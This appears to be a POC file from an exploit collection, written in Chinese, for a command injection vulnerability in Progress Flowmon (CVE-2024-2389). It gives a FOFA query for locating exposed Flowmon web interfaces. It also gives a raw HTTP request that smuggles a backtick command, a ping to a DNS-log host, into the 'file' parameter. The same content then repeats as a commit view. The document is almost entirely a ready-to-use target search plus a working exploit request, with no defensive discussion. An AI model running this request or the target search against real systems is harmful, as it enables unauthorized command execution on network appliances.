POC/wpoc/Progress/Progress-Flowmon命令注入漏洞(CVE-2024-2389).md

## Progress-Flowmon命令注入漏洞(CVE-2024-2389)


## fofa
```
body="Flowmon-Web-Interface"
```


## poc
```
GET /service.pdfs/confluence?lang=en&file=`ping+dnslog地址` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
```
first commit 2025-03-04 23:12:57 +08:00			`## Progress-Flowmon命令注入漏洞(CVE-2024-2389)`


			`## fofa`
			```
			`body="Flowmon-Web-Interface"`
			```


			`## poc`
			```
			GET /service.pdfs/confluence?lang=en&file=`ping+dnslog地址` HTTP/1.1
			`Host: x.x.x.x`
			`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15`
			`Connection: close`
			`Accept: /`
			`Accept-Language: en`
			`Accept-Encoding: gzip`
			```